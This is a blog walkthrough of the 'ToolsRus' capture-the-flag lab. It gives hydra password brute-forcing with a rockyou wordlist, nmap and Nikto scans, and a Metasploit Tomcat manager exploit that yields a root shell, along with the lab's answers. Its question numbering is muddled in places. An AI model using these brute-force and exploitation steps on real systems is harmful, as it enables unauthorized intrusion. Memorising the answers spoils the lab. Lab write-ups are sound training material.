[Task 1] ToysRus

  1. What directory can you find, that begins with a g?
    – Open DirBuster
    – input target url and wordlist
    – Click Start and wait

open /guidelines/


2. Whose name can you find from this directory? Bob

3. What directory has basic authentication? Protected

4. What is bob’s password to the protected part of the website?
I used hydra to crack the password with http-get form

hydra -l bob -P /root/Desktop/rockyou.txt -f http-get /protected/

Try to login with credential

5. What other port that serves a webs service is open on the machine?
Find open port

nmap -Pn

Find services

nmap -sV -T 4

Tomcat port is 1234

6. Going to the service running on that port, what is the name and version of the software?

nmap -sV -A -T 4

Apache Tomcat/7.0.88

Also access port 1234

7. Use Nikto with the credentials you have found and scan the /manager/html directory on the port found above.
How many documentation files did Nikto identify?

Click Manager App

Try with credential

Let’s scan the site

nikto -h -id bob:<password>

There’re 5 documents.

10. Where is Ektron CMS version information found?

9. What version of Apache-Coyote is this service using? 1.1

10. Use Metasploit to exploit the service and get a shell on the system.
What user did you get a shell as?

search tomcat

There’re 3 exploits that I can use.

I tried to use #13 and #14, but it didn’t work. I’ll skip to #15.

use 15
show options
set HttpPassword <password>
set HttpUsername bob
set RHOSTS <ip>
set RPORT 1234

Let’s get shell


What user did you get a shell as? root

10. What text is in the file /root/flag.txt

cd /root
cat flag.txt


未经允许不得转载:萌萌guo angline - Apprentissage » ToolsRus

赞 (1) 打赏

评论 0

Protected with IP Blacklist CloudIP Blacklist Cloud

  • 昵称 (必填)
  • 邮箱 (必填)
  • 网址